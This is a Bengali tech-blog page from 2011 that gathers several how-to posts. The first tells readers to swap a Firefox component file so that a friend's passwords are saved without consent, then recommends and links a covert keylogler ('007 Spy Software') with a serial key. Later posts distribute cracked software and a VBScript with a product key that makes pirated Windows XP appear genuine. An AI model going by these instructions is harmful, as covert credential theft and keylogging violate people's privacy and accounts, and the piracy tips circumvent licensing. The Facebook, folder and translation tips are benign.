সোমবার, ২৮ মার্চ, ২০১১

যে কোন পাসওয়ার্ড হ্যাক করুন কোন সফটওয়্যার ছাড়াই!+সেরা একটা কীলগার

যে কোন বিষয় থেকে সবারই হ্যাকিং রিলেটেড টিউনের প্রতি বেশি আকর্ষন। হ্যাকার হিসেবে নিজেকে অনেকেই দাবি করে। সবাইযে হ্যাকিং জানেনা তা না অনেকেই জানে। এটা আমাদের জন্য বেশ গর্বের বিষয়। তবে প্রকৃত হ্যাকাররা কখনও নিজের পরিচয় প্রকাশ করতে চায় না। আমার এই টিউনটি আমার ভাল একটা ফ্রেন্ড সায়েমকে উৎসর্গ করছি।
বন্ধুরা প্রায়ই আমার কম্পিউটারে বসে মেইল চেক করে বা ফেসবুক ব্যবহার করে। কেমন হয় যদি আপনার বন্ধুর পাসওয়ার্ড আপনি জেনে জান? icon wink যে কোন পাসওয়ার্ড হ্যাক করুন কোন সফটওয়্যার ছাড়াই!+সেরা একটা কীলগার | Techtunes আমরা প্রায় সবাই মজিলা ব্যবহার করি। আপনার বন্ধু যখন মজিলাতে কোন পাসওয়ার্ড দিয়ে লগইন করবে আপনি খুব সহজেই তার পাসওয়ার্ড বের করে ফেলতে পারবেন তার অজান্তেই! আর এজন্য কোন সফটওয়্যারের দরকার নেই। শুধু নিচের ধাপগুলো অনুসরন করলেই পেয়ে যাবেন আপনার কাংখিত পাসওয়ার্ড।

যেভাবে পাসওয়ার্ড হ্যাক করবেনঃ

  1. প্রথমে ডাউনলোড করুন এ ফাইলটি।
  2. যদি এই মুহুর্তে মজিলা চালু থাকে তাহলে তা ক্লোজ করে দিন।
  3. তারপর যান এখানে C:/Program Files/Mozilla Firefox/Components
  4. ঐখান থেকে nsLoginManagerPrompter নামের একটা ফাইল খুজে বের করুন।
1127201061100pm যে কোন পাসওয়ার্ড হ্যাক করুন কোন সফটওয়্যার ছাড়াই!+সেরা একটা কীলগার | Techtunes
এখন ডাউনলোড করা ফাইলটি এখানে রিপ্লেস করে দিন। (সতর্কতাস্বরুপ আগের ফাইলটি কপি করে রাখতে পারেন।)
ব্যাস কাজ শেষ!
এখন থেকে মজিলাতে যদি কেউ লগইন করে তাহলে তার অনুমতি ব্যতীত পাসওয়ার্ড সেভ করে রাখবে।

যেভাবে পাসওয়ার্ড দেখবেনঃ

  1. প্রথমে মজিলা ওপেন করুন।
  2. তারপর যান এখানে Tools > Options > Security Tab
  3. তারপর saved passwords এ ক্লিক করুন।
1127201061936pm যে কোন পাসওয়ার্ড হ্যাক করুন কোন সফটওয়্যার ছাড়াই!+সেরা একটা কীলগার | Techtunes
এখন show passwords এ ক্লিক করার পর yes দিন।
আর দেখুন সেই গোপন পাসওয়ার্ড।

সেরা একটা কীলগার সফটওয়্যার 007 Spy Software:

  • কীবোর্ডে যা যা টাইপ করেছেন তা দেখতে পারবেন। এমনকি স্ক্রিন কীবোর্ডেরটাও!(ক্যাস্পারস্কি স্ক্রিন কীবোর্ড ছাড়া)
  • কোন কোন ওয়েবসাইট ভিজিট করেছেন জানতে পারবেন।
  • কোন সফটওয়্যার ব্যবহার করলে তার খবরও জানা যাবে।
  • অটোমেটিক ৫-৬০ সেকেন্ড পর পর স্ক্রীন শট তুলতে থাকবে।
  • এছাড়া মেইলের মাধ্যমেও পাসওয়ার্ড হালনাগাদ করা যাবে!
  • আর এসব কিছুই হবে গোপনে! icon wink যে কোন পাসওয়ার্ড হ্যাক করুন কোন সফটওয়্যার ছাড়াই!+সেরা একটা কীলগার | Techtunes
ইন্সটল করার পর ctrl+alt+F7 চাপলেই সব দেখতে পারবেন।
1127201064214pm যে কোন পাসওয়ার্ড হ্যাক করুন কোন সফটওয়্যার ছাড়াই!+সেরা একটা কীলগার | Techtunes
আর বিস্তারিত বললাম না। তাহলে ঘরে ঘরে পাসওয়ার্ড হ্যাক হবে। icon wink যে কোন পাসওয়ার্ড হ্যাক করুন কোন সফটওয়্যার ছাড়াই!+সেরা একটা কীলগার | Techtunes icon razz যে কোন পাসওয়ার্ড হ্যাক করুন কোন সফটওয়্যার ছাড়াই!+সেরা একটা কীলগার | Techtunes

ডাউনলোডঃ

007_Spy_Software
সাইজ মাত্র ১ মেগাবাইট। সাথে সিরিয়াল কী দেয়া আছে।

আগের কিছু টিউনঃ

  1. 1000 Hacker Tutorials নিন মাত্র 9MB এ!!!!!!
  2. হ্যাক যেভাবে করতে হয় এবং হ্যাকিং থেকে বাচার উপায়(PDF টিউটোরিয়াল)
আশা করি আপনাদের ভাল লাগবে।

চেঞ্জ করুন আপনার কান্ট্রি ভিত্তিক আই পি

য় ভাই বন্ধুরা, সবাইকে আস্ সালামুআলাইকুম, আজ আমি কিছুক্ষণ আগে একটি সাহায্য অপশনে দেখলাম কেউ একজন আই পি চেঞ্জ সফট সম্পর্কে জানতে চাইছেন। তাই আমার এই পোস্ট। আই পি চেঞ্জ করার জন্য আমি যে সফটটি ব্যবহার করি তার নাম “প্লাটিনাম হাইড আই পি”, এটি একটি চমৎকার সফটওয়্যার।
images চেঞ্জ করুন আপনার কান্ট্রি ভিত্তিক আই পি | Techtunes
Platinum IP Hide
সফটওয়্যারের ফুল র্ভাসনটি আমি লিংক দিয়ে দিলাম শুধু ডাউনলোড করলেই হবে। এখানে ক্লিক করে ডাউনলোড করুণ মিডিয়া ফায়ার লিংক এই খানে।  সফটওয়্যরটি প্রথমে ইন্সটল করে নিন এরপর এর সাথে দেওয়া ক্রাক ফাইল পোগ্রাম ফাইলের যেখানে সফটওয়্যারটি ইন্সটল হয়েছে সেখানে গিয়ে রিপ্লেস করে নিন, রিপ্লেস করলেই আপনার সফটওয়্যারটি ফুল র্ভাসন হয়ে যাবে। এবার রান করালে নিচের স্কিনের মত দেখাবে ।
Untitled 1 copy চেঞ্জ করুন আপনার কান্ট্রি ভিত্তিক আই পি | Techtunes
স্ক্রিন০১
আপনি  সহজেই হাইড আপি বাটনে  ক্লিক করলেই আপনার আই পি হাইড হয়ে যাবে।
001 চেঞ্জ করুন আপনার কান্ট্রি ভিত্তিক আই পি | Techtunes
০২
এরপর আপনি যদি কোন বিশেষ দেশের আইপি ব্যবহার করতে চান তাহলে choose IP Country থেকে আপনার পছন্দের কান্ট্রি বেছে নিন। অন্য সব আই পি হাইডিং সফটওয়্যারের চাইতে এটি উত্তম বলে আমার কাছে মনে হয়েছে। সাধারণত উন্নত দেশ গুলোর আই পি সিলেক্ট করলে ইন্টারনেটের স্পিড স্লো হয় না।
002 চেঞ্জ করুন আপনার কান্ট্রি ভিত্তিক আই পি | Techtunes
০৩
এই পোগ্রামটি ব্যাবহার করলে কিছু কিছু রেয়ার সাইট ছাড়া বাকি সব সাইটে আপনার মূল আই পি ধরা পরবে না। এমন কি গুগলে ও আপনার আই পি ধরা পরবে না । গুগলের একটি স্ক্রিন নিচে উপস্থাপন করলাম ।
Document0002 চেঞ্জ করুন আপনার কান্ট্রি ভিত্তিক আই পি | Techtunes
গুগল
এত ক্ষণ কষ্টকরে এই টিউনটি পড়ার জন্য ধন্যবাদ, আপনাদের কমেন্টসের অপেক্ষায় রইলাম
আইটি  প্রেমী রুহুল ভাইয়ের উদ্দেশ্যে বলছি – ধন্যবাদ ভাই আপনার মুল্যবান কমেন্টস দেওয়ার জন্য। আপনি হয়তো দেখতে ভুল করেছেন আমি ডি ইউ মিটার ব্যবহার করি না। আর ঐ টা পছন্দ ও করি না। আমি ব্যাক্তিগত ভাবে নেট মিটার পছন্দ করি এটা ফ্রিওয়্যার তাই ঝামেলাহীন। এই খানে ডাউনলোড লিংক দিয়ে দিলাম সবার কাজে  আসতে পারে। http://www.softpedia.com/dyn-postdownload.php?p=23932&t=3&i=1
সবার আহবানে আমি মিডিয়া ফায়ার লিংক দিয়ে দিলাম আশা এখন আর সমস্যা হবে ।  http://www.mediafire.com/?m0fla9p1ingbue4

লুকিয়ে লুকিয়ে দিন ফেসবুক status

আসসালামুআলাইকুম। আশা করি সবাই ভালো আছেন। নিশ্চয় এতক্ষণে বুঝে ফেলেছেন টিউনটি ফেসবুক বিষয়ক। দেরি না করে মূল কথায় আসি।
আমরা যারা ফেসবুক ব্যবহার করি তারা অনেকেই এই সমস্যার মুখোমুখি হই। সমস্যাটা হল কেউ মন খুলে শান্তিমত স্ট্যাটাস দিতে পারি না। কারণ ফ্রেন্ড লিস্টে থাকা কিছু ফ্রেন্ড। আমিও আগে এই জন্য status দিতে পারতাম না। ফ্রেন্ড লিস্টে এমন কিছু মুরুব্বি  টাইপের ফ্রেন্ড থাকে যাদের জন্য ইচ্ছামত স্ট্যাটাসও দেয়া যায় না আবার তাদেরকে রিমুভও করা যায় না।আসুন, সমস্যাটার সমাধান করি।
প্রথমে হোম পেজ অথবা প্রোফাইল পেজের যে জায়গায় স্ট্যাটাস দেন সে জায়গায় আসুন। তারপর নিচের র্নিদেশিত লক চিহ্নটিতে ক্লিক করুন।
hidefacebookstatus thumb লুকিয়ে লুকিয়ে দিন ফেসবুক status | Techtunes
তারপর  customize এ যান।
facebookstatushide thumb1 লুকিয়ে লুকিয়ে দিন ফেসবুক status | Techtunes
customize ক্লিক করলে custom privacy নামে  যে পেজ আসবে তাতে  প্রথমে লেখা থাকবে make this visible to these people:
সেখানে কয়েকটি অপশন পাবেন। তার মধ্যে specific people সিলেক্ট করে যাদের নাম সিলেক্ট করবেন শুধু তারাই দেখতে পাবে আপনার status.
customprivacyfacebook thumb লুকিয়ে লুকিয়ে দিন ফেসবুক status | Techtunes
আবার তার নিচে দেখতে পাবেন Hide this from. সেখানে যাদের নাম সিলেক্ট করবেন তারা বঞ্চিত হবে আপনার স্ট্যাটাস থেকে। আপনার setting  টি স্থায়ীভাবে রাখতে চাইলে ক্লিক করুন Make this my default setting অপশনটিতে।
এভাবে আপনার ইচ্ছামত privacy দিয়ে status setting পরিবর্তন করতে পারবেন।

আন লক করুন যে কোন ফেক ফোল্ডর লকড-ফোল্ডার সাথে চমৎকার একটি লকার+হাইডার

ধন্যবাদ আপনাকে, আমার আজকের এই টিউনটি আপনারই জন্য। আমাদের কম্পিউটারে কাজের নানান ধরনের উপকরণ থাকে যা  সবার সাথে শেয়ার না করতে চাওটাই স্বাভাবিক। আমাদের মধ্যে অনেকেই রয়েছেন যারা ফেক ফোল্ডারের মত সফট ব্যবহার করে ফোল্ডার লক করে থাকি  কিন্তু ফেক ফোল্ডার সাধারণত একটি বিশেষ কোড ব্যবহার করে ফোল্ডারে ডেস্টিনেশন ফরওর্য়াড করে দেয় এবং ওপেন করলেই তা কন্ট্রোল ফ্যানেলে চলে য়ায়। এই  বিশেষ কোড টি ফোল্ডারের নামের শেষে জুড়ে দেয় আপনি যদি এই কোড টি রিমুভ করেন তাহলেই আপনার ফোল্ডারটি আন লক হয়ে ডাবে।
Untitled 1 copy আন লক করুন যে কোন ফেক ফোল্ডর লকড ফোল্ডার সাথে চমৎকার একটি লকার+হাইডার | Techtunes
একটি লকড ফোল্ডারের নমুনা
আর আপনি ফেক ফোল্ডার সফট ছাড়াই যদি এই কোড টি কোন ফোল্ডারের নামের শেষে যুক্ত করে দেন তাহলে তা লকড হয়ে যাবে। এবার বলুন আপনি কি আর ফেক ফোল্ডার ব্যবহার করবেন?
002 আন লক করুন যে কোন ফেক ফোল্ডর লকড ফোল্ডার সাথে চমৎকার একটি লকার+হাইডার | Techtunes
মতামত
আপনি যে কোন, যে কোন ফোল্ডারের নামের শেষে সহজেই শুধু .{21EC2020-3AEA-1069-A2DD-08002B30309D} কোড টি পেস্ট করে দিন, খেয়াল রাখবেন সাথে কিন্তু একটি  “.”  আছে ঐ টি সহ দিবেন।
যাই হোক এবার মুল প্রসংগে ফিরে আসি, আমি যে সফট টি ফোল্ডার লক করার জন্য ব্যবহার করি সেটি শুধু ফোল্ডার লক ই করে না সাথে সাথে ফোল্ডারকে সর্ম্পূণ রূপে হাইড করে দেয়। এতে আপনি কারও কাছ থেকে কিছু হাইড করলে সে সেটা টের ও পাবে না। এ কাজ টি করার জন্য আপনাকে ইউনির্ভাসাল সিলড নামক একটি সফটওয়্যার ব্যবহার করতে হবে।
images আন লক করুন যে কোন ফেক ফোল্ডর লকড ফোল্ডার সাথে চমৎকার একটি লকার+হাইডার | Techtunes
পছন্দের সফটওয়্যার
পছন্দের সফটওয়্যারটি আমি মিডয়া ফয়ার এবং ৪সেয়ার এ আপলোড করে দিব যাতে সবার ডাউনলোড করতে সুবিধা হয়।
মিডিয়া ফায়ার লিংক
৪শেয়ার লিংক
এবার কাজের কথায় আসি ,  পছন্দের সফটওয়্যারটির সাথে আমি এর ক্রাকটি ও দিয়ে দিলাম।  সফটওয়্যারটির ইন্সটল করার সময় আপনার কাছে পাসওর্য়াড চাইবে, আপনি আপনার মনের মত পাসওর্য়াডটি দিন ইন্সটল শেষে রির্স্টট চাইবে , রির্স্টাটের পর ক্রাক ফাইলটি কপি করুন, এবার র্স্টাট মেনু থেকে বা ডেক্সটপ থেকে সফটওয়্যারটির আইকনের উপর রাইট ক্লিক করে ফাইন্ড র্টাগেট এ ক্লিক করুন। এবার সফটটি যেখানে ইন্সটল হয়েছে সে ফোল্ডরটি ওপেন হবে এখানে আপনি আগে থেকে কপি করা ক্রাকটি পেস্ট করে দিন, ব্যাস হয়ে গেল ফুল ভার্সন।
এবার রান করুন, রান করলে নিচের স্ক্রিনের মত দেখাবে। আপনার কাছে পাসওর্য়াড চাইবে। পাসওর্য়াড দিন ।
universal shild আন লক করুন যে কোন ফেক ফোল্ডর লকড ফোল্ডার সাথে চমৎকার একটি লকার+হাইডার | Techtunes
universal shild
পাসওর্য়াড দেওয়ার পর নিচের স্ক্রিনের মত পোগ্রামটি রান হবে।
05 আন লক করুন যে কোন ফেক ফোল্ডর লকড ফোল্ডার সাথে চমৎকার একটি লকার+হাইডার | Techtunes
প্রথম স্ক্রিন
এখন আপনি প্রোটেকশন বাটনে ক্লিক করে কোন ফোল্ডার, ফাইল এমন কি ডাইভ কে ও আপনি যুক্ত করতে পারেণ।
06 আন লক করুন যে কোন ফেক ফোল্ডর লকড ফোল্ডার সাথে চমৎকার একটি লকার+হাইডার | Techtunes
কাস্টোমাইজ
এর পর আপনি ড্রাইভ, ফোল্ডার, ফাইল এড করার পর ডান পাশের লক বাটনে ক্লি করলেই লক হয়ে যাবে, এখান থেকে আপনি লক , আনলক করতে পারবেন।
07 আন লক করুন যে কোন ফেক ফোল্ডর লকড ফোল্ডার সাথে চমৎকার একটি লকার+হাইডার | Techtunes
কাস্টোমাইজ
এই পোগ্রামটি সর্টকাট কি ব্যবহার এর সুবিধা ও রয়েছে, আপনি চাইলে এক ক্লিকেই সব লক এবং আনলক করতে পারবেন তবে পাসওর্য়াড ছাড়া না।
08 আন লক করুন যে কোন ফেক ফোল্ডর লকড ফোল্ডার সাথে চমৎকার একটি লকার+হাইডার | Techtunes
কাস্টমাইজ সর্টকাট কি
যে কাজের সর্টকাট কি ব্যবহার করতে চান সেখানে মাউস রেখে কি বোর্ডের কি প্রেস করলেই কি একটিভ হয়ে যাবে।
ধন্যবাদ এতক্ষনধরে টিউনটি পড়ার জন্য, আপনার সমান্যতম কাজে আসলেই আমার এই টিউনটি সার্থক হবে। যে কোন ধরনের কমেন্টস স্বাদরে গ্রহন করব, আর অবশ্যই অবশ্যই অনেক বেশী কমেন্টস আশা করি।

আপনার ড্রাইভ/ফোল্ডার এ আপনার মনের মত ফটো সেট করুন এজ জলকে।

ভাল আছেন তো সবাই।
আজকে আপনাদের আমি একটি মজার টিপস্ দেবো।
হয়তো বা অনেকের জানা, তবুও যাদের জানা নেই তাদের কাছে ভালো লাগবে।
আপনাদের প্রথমে Customize Folder Software টি ডাউনলোড করতে হবে। হয়তো বা ভাবছেন Software টা জানিইনা প্রথমেই ডাউনলোড করতে বলছে।
এবার আপনাদের Customize Folder Software টি নিয়ে বলছি।
এই সফটওয়ার দিয়ে আপনার ডাইভ/ফোল্ডার এ ছবি সেট করতে পারবেন, টেক্স কালার করতে পারবেন, আয়কন চেন্জ করতে পারবেন।
ডাউন লোড এর জন্য লিংক দেওয়া হল।
Customize Folder
Only 1.13 MB
Customize Folder.rar নামিয়ে নিন, এরপর Winrar সফটওয়ার দিয়ে Extract করে নিন।
01 আপনার ড্রাইভ/ফোল্ডার এ আপনার মনের মত ফটো সেট করুন এজ জলকে। | Techtunes
Extract হয়ে গেলে
Customize Folder টি ওপেন করুন,  Setup.exe তে ডাবল কিল্ক করুন, এবং
Setup Complete করুন|
02 আপনার ড্রাইভ/ফোল্ডার এ আপনার মনের মত ফটো সেট করুন এজ জলকে। | Techtunesএবার My Conputer এ যান  এবং যে কোন ডাইভে Properties এ যান।
03 আপনার ড্রাইভ/ফোল্ডার এ আপনার মনের মত ফটো সেট করুন এজ জলকে। | Techtunes
লক্ষ করুন Customize নামে একটি টেব হয়েছে।
04 আপনার ড্রাইভ/ফোল্ডার এ আপনার মনের মত ফটো সেট করুন এজ জলকে। | Techtunes
এবার ছবি সেট করার পালা, Customize টেবে গিয়ে Browse… বাটনে কিল্ক করুন।
05 আপনার ড্রাইভ/ফোল্ডার এ আপনার মনের মত ফটো সেট করুন এজ জলকে। | Techtunes
আপনার যে কোন ডাইভ থেকে ছবি ওপেন করুন।
06 আপনার ড্রাইভ/ফোল্ডার এ আপনার মনের মত ফটো সেট করুন এজ জলকে। | Techtunes
Preview তে ছবি দেখা গেলে OK বাটনে কিল্ক করুন।
07 আপনার ড্রাইভ/ফোল্ডার এ আপনার মনের মত ফটো সেট করুন এজ জলকে। | Techtunes
এবার My Computer Close করে আবার রানিং করুন।
আপনার যে ডাইভে ছবিটি সেট করেছেন সেই ডাইভ টি ওপেন করুন দেখবেন আপনার ছবিটি সেট হয়ে গেছে।
টিপস্টা ভাল লাগলে কমেন্টস করবেন।

১ মিনিটে ১টি ক্লিক করে Windows XP জেনুইন করুন সাথে জেনুইন চেক করা সোফটওয়্যার(কোডিং দিয়ে দিলাম, নিজেও বানিয়ে নিতে পারেন)

আমি জানি এটা নিয়ে অনেক টিউন হয়েছে আগে, তবে একবার দেখে বলুন তো এত ইজি ভাবে জেনুইন করার ট্রিক্স কি আগে দেখেছেন? হতে পারে দেখেছেন পুরানো ব্লগার রা নতুন দের উপকার হবে তাই দিলাম। জেনুইন জিনিস ইউস করার মজাই আলাদা তাই না? এনিওয়েস প্যাচাল অফ করলাম। সবাই ভালো থাকুন।

টিউন কনফিগারেশন:-

|———————————————|
| ইউসার লেভেল – বিগিনার লেভেল
| ডিফিকাল্টি – ১০%
| এখান থেকে ডাউনলোড করুন (2mb)
|———————————————|

দেখুন কিভাবে কাজ করতে হবে

জেনুইন করুন এভাবে

ডাউনলোড করার পর আনজিপ করে নিলে ফোলডারে ৪টা ফাইল পাবেন নিচের ছবির মত। Run.bat নামের ফাইলে ডাবল ক্লিক করুন আপনার এক্সপি জেনুইন হয়ে যাবে। হিহি। (সার্ভিস প্যাক ২ তে আমি ইউস করেছি।)
0003 ১ মিনিটে ১টি ক্লিক করে Windows XP জেনুইন করুন সাথে জেনুইন চেক করা সোফটওয়্যার(কোডিং দিয়ে দিলাম, নিজেও বানিয়ে নিতে পারেন) | Techtunes

জেনুইন চেক করুন এভাবে

১। এখন চেক করার জন্য MGADiag.exe এই নামের ফাইল টা ওপেন করুন
chekc ১ মিনিটে ১টি ক্লিক করে Windows XP জেনুইন করুন সাথে জেনুইন চেক করা সোফটওয়্যার(কোডিং দিয়ে দিলাম, নিজেও বানিয়ে নিতে পারেন) | Techtunes
২। এখন নিচের ছবিতে মার্ক করা আছে যেখানে মানে continue লিখায় ক্লিক করুন
0001 ১ মিনিটে ১টি ক্লিক করে Windows XP জেনুইন করুন সাথে জেনুইন চেক করা সোফটওয়্যার(কোডিং দিয়ে দিলাম, নিজেও বানিয়ে নিতে পারেন) | Techtunes
৩। আপনার ইনডোস জেনুইন হলো কিনা সেটা দেখুন, নিচের ছবিতে মার্ক করা আছে। জেনুইন না হলে লিখা আসবে ইনভেলিড সিরিয়াল কি। জেনুইন থাকলে লিখা থাকবে সবুজ কালারে “জেনুইন”
00021 ১ মিনিটে ১টি ক্লিক করে Windows XP জেনুইন করুন সাথে জেনুইন চেক করা সোফটওয়্যার(কোডিং দিয়ে দিলাম, নিজেও বানিয়ে নিতে পারেন) | Techtunes

সিরিয়াল কি চেন্জ করুন এভাবে

১। Run.bat নামের ফাইলে রাইট ক্লিক করে ইডিটে ক্লিক করুন ওখানে যেই নাম্বারটা আছে সেটা বদল করে নিউ নাম্বার দিয়ে দিন তার পর সেভ করে Run.bat ফাইলটি আবার ডাবল ক্লিক করুন, হয়ে যাবে।চেক করতে চাইলে আগের মত চেক করে নিন।
আমি আপনাদের ১০০টি জেনুইন সিরিয়াল দিয়ে দিলাম। সার্ভিস প্যাক ২ এর জন্য। কয়েকটা কাজ না করলে পরের গুলো ট্রাই করুন।

নিজে যদি এই কোড বানাতে চান তাহলে এভাবে

১। নোটপেড ওপেন করে নিচের কোড গুলো ChangeKeyXP.vbs নামে সেভ করুন।
ON ERROR RESUME NEXT

if Wscript.arguments.count<1 then
Wscript.echo "Script can't run without VolumeProductKey argument"
Wscript.echo "Correct usage: Cscript ChangeKeyXP.vbs ABCDE-FGHIJ-KLMNO-PRSTU-WYQZX"
Wscript.quit
end if

Dim VOL_PROD_KEY
VOL_PROD_KEY = Wscript.arguments.Item(0)
VOL_PROD_KEY = Replace(VOL_PROD_KEY,"-","") 'remove hyphens if any

for each Obj in GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf ("win32_WindowsProductActivation")

result = Obj.SetProductKey (VOL_PROD_KEY)

if err <> 0 then
WScript.Echo Err.Description, "0x" & Hex(Err.Number)
Err.Clear
end if

Next
২। এখন নিচের কোড গুলো নতুন একটা নোটপেড অপেন করে Run.bat নামে সেভ করুন
Cscript ChangeKeyXP.vbs BKQW7-3JYTB-D26TX-DHPDM-3MTKG
৩। জেনুইন করতে চাইলে run.bat নামের ফাইলে ডাবল ক্লিক করুন। জেনুইন চেক করতে ও সিরিয়াল কি চেন্জ করুন আগের মত করে।
সবাইকে আনেক ধন্যবাদ, সবাই ভালো থাকুন

ফেসবুকের ভিন্নভাষী বন্ধুর ভাষা অনুবাদ করুন সহজেই

সবাই কেমন আছেন ? অনেকদিন পর টিউন করছি।টেকটিউনে আমার লগইন করার পাসওয়ার্ডই ভুলে গিয়েছিলাম।পাসওয়ার্ড ইমেইল দিয়েও কাজ হচ্ছিলো না।আমি যে ইমেইল দিয়ে টেকটিউন ব্যবহার করি সেটিও ভুল দেখানো হচ্ছে।জানি না কেন এরকম হলো।আর আমি এমন কোন টিউন করেছি বলে মনে হয় না যার জন্য টেকটিউন থেকে আমাকে ব্যান করবে।ভালো মন্দ কিছু সংখ্যক টিউন করেছি আগে,এখন সেই টিউনগুলোর সাথে  আর টিউন যোগ করতে পারবো না এটা মেনে নিতে পারছিলাম না।এভাবে প্রায়ই লগইন ব্যর্থ চেষ্টা করেছি।আজ কিভাবে যেন অবশেষে ঢুকে পড়লাম।আপাতত সামান্য একটা টিউন দিয়ে আমার পুর্নযাত্রা শুরু করি।
সামাজিক যোগাযোগের জনপ্রিয় সাইট ফেসবুকের সাহায্যে আমরা অনেক সময় ভিন্ন ভাষী মানষের সাথে বন্ধুত্ব করি।কিন্তু অনেক সময় ভিনদেশী বন্ধুরা ফেসবুকে তাদের মাতুভাষা ব্যবহার করে।যার ফলে আমরা তাদের প্রোফাইল তথ্য,স্ট্যাটাস ইত্যাদি লেখা বুঝতে পারি না।জনপ্রিয় ব্রাউজার মজিলা ফায়ারফক্স ব্যবহার করে ইচ্ছে করলে আপনি যে কোন ভাষার লেখা অনুবাদ করে নিতে পারেন।এজন্য আপনার লাগবে Facebook Translate নামের একটি এ্যাডঅন।এ্যাডঅনটি  http://addons.mozilla.org/en-US/firefox/addon/159637/
ঠিকানা থেকে নামিয়ে নিন।
এরপর ফায়ারফক্স রির্স্টাট দিন ।এখন ফেসবুকে লগইন করুন।খেয়াল করুন ফেসবুকে সকল স্ট্যাটাস,ওয়াল,ম্যাসেজ ইত্যাদির সাথে translate নামে একটি অপশন এসেছে।এই অপশনে ক্লীক করলে ভিন্ন ভাষার যেকোন লেখা   ইংরেজীতে অনুবাদ হয়ে যাবে।
টিউনটি ভালো লাগলে/খারাপ লাগলে কমেন্ট করবেন।আর টিউনটি আগে হয়ে থাকলে আমার বলার কিছু নাই।

নতুন ইমেইল আসলে তার নোটিফিকেশন আসবে মোবাইলে(ফ্রী)। Gmail সহ বেশিরভাগ সার্ভীসের।

হুম সত্যি বলছি। তবে বিষয়টা একটু পেচ লাগানো। gmail বা yahoo এর কোন সার্ভিস না। এটা হবে শুধুমাত্র GP এবং BanglaLink-এ। আসল রহস্যটা হল ফেসবুকের sms নোটিফিকেশন। অর্থাৎ প্রত্যেকটি sms ফেসবুক ঘুরে আসবে।

সুবিধাসমূহঃ

  • ইমেইলের সাবজেক্ট আপনার মোবাইলে চলে আসবে।
  • কোন ফি দিতে হবেনা।
  • ইন্টার্নেট না থাকলেও কি কি মেইল এল তার ধারনা থাকবে।
  • জরুরী ইমেইল পড়তে দেরি হবেনা।

সীমাবদ্ধতাঃ

  • শুধুমাত্র সাবজেক্ট আসবে সেন্ডারের নাম বা ইমেইল অ্যাড্রেস আসবে না।(এটা সমাধান করা সম্ভব কিন্তু ঝামেলাপূর্ণ)
  • শুধুমাত্র বাংলালিঙ্ক এবং গ্রামীণফোনের জন্য।
  • বাংলা ইমেইলের সাবজেক্ট পাবেন না। (আপনার মোবাইল বাংলা সাপোর্ট করলেও না।
  • গ্রামীণফোনে মাঝে মাঝে সমস্যা করে। (তবে খুব কম)
  • আমার ইন্সট্রাকশন ঠিকমত ফলো না করলে প্রাইভেসির ১২টা বাজতে ১২ সেকেন্ড সময় লাগবেনা।
  • ইমেইল ফরওয়ার্ডের অপশন থাকতে হবে। মানে হটমেইল এবং ইয়াহুতে কাজ হবেনা। তবে পুরাতন ইয়াহু হলে হবে।
  • মেইলে অ্যাটাচমেন্ট থাকলে নোটিফিকেশন আসবেনা।

যেভাবে করবেনঃ

  1. ফেসবুকে একটি একাউন্ট থাকতে হবে। না থাকলে করে নিন।
  2. আপনার মোবাইলে Facebook sms এর জন্য রেজিষ্ট্রেশন করুন। সাহায্যের জন্য এই টিউন দেখতে পারেনঃ http://techtunes.com.bd/micro-tunes/tune-id/29289/
  3. এবার ফেসবুকে আরেকটি একাউন্ট খুলোন।
  4. নতুন একাউন্টে লগইন করে Account-> Privacy Settings -এ যান।
  5. Friends Only-তে ক্লিক করুন।privecy1 নতুন ইমেইল আসলে তার নোটিফিকেশন আসবে মোবাইলে(ফ্রী)। Gmail সহ বেশিরভাগ সার্ভীসের। | Techtunes
http://www.facebook.com/mobile -যান। দেখুন একটি গোপন ইমেইল অ্যাড্রেস দেয়া আছে। অনকটা এরকমঃ like786this@m.facebook.com। এটা কপি করে ইমেইল থেকে ফরওয়ার্ডিং সেট করুন। ফরওয়ার্ডিং সেট করার নিওম একেক যায়গায় একেক রকম। তাই এ বিষয়ে বিস্তারিত বলতে পারছিনা। gmail এ ফরওয়ার্ড সেট করতে নতুন ট্যাব/উইন্ডোতে জিমেইলে লগইন করুন।  Settings থেকে Forwarding and POP/IMAP ট্যাবে যান। এবার Add a forwarding address বাটনে ক্লিক করুন। facebook-এ পাওয়া গোপন অ্যাড্রেসটি পেষ্ট করুন এবং Next -এ ক্লিক করুন। আবার ফেসবুক ওয়ালে যান এবং দেখুন একটি কোড সহ ওয়ালপোষ্ট আছে।
confirm নতুন ইমেইল আসলে তার নোটিফিকেশন আসবে মোবাইলে(ফ্রী)। Gmail সহ বেশিরভাগ সার্ভীসের। | Techtunes
কোডটি ব্র্যাকেটের ভেতর এবং সামনে হ্যাস (#) আছে। হ্যাস ছাড়া কোডটি কপি করে জিমেইলে গিয়ে confirmation code বক্সে পেষ্ট করে Verify ক্লিক করুন। ভেরিফি হয়ে গেলে creating a filter!-এ ক্লিক করুন উপরের দিকে ফিল্টার কনফ্রীগারেসনের কিছু ফিল্ড আসবে। Form ফিল্ডে লিখুন “-Facebook” এবং Next Step এ ক্লিক করুন।
fw11 নতুন ইমেইল আসলে তার নোটিফিকেশন আসবে মোবাইলে(ফ্রী)। Gmail সহ বেশিরভাগ সার্ভীসের। | Techtunes
এবার Forward it to: এর বাম পাশে টিক চিহ্ন দিয়ে (লক্ষ রাখবেন যেন ফেসবুকের সেই ইমেইল অ্যাকাউন্টটা সিলেক্ট করা থাকে।) Create Filter ক্লিক করুন। fw21 নতুন ইমেইল আসলে তার নোটিফিকেশন আসবে মোবাইলে(ফ্রী)। Gmail সহ বেশিরভাগ সার্ভীসের। | Techtunes
6. কাজ মোটামোটি শেষ নতুন তৈরী ফেসবুক একাউন্টটি থেকে আপনার মূল একাউন্ট (যেটাতে sms রেজিষ্ট্রেশন করা আছে) তাতে ফ্রেন্ডস রিকুয়েষ্ট পাঠান এবং লগ আউট করুন।
7. আপনার মূল একাউন্টে লগ ইন করে ফ্রেন্ডস রিকুয়েষ্ট একসেপ্ট করুন।
8. আপনার মোবাইলে(অবশ্যই ফেসবুক এসএমএস রেজিষ্ট্রার করা) মেসেজ অপশনে লিখুন- “subscribe<স্পেস><আপনার নতুন অ্যাকাউন্টের নাম>” এবং পাঠিয়ে 32665 (বাংলালিঙ্ক থেকে) এবং 2555 (গ্রামীণফোন থেকে).
ব্যাস হয়েগেল। কিছুক্ষন পর কনফার্মেশন এসএমএস আসবে এবং পেয়ে যাবেন সকল আপডেট মোবাইলে।
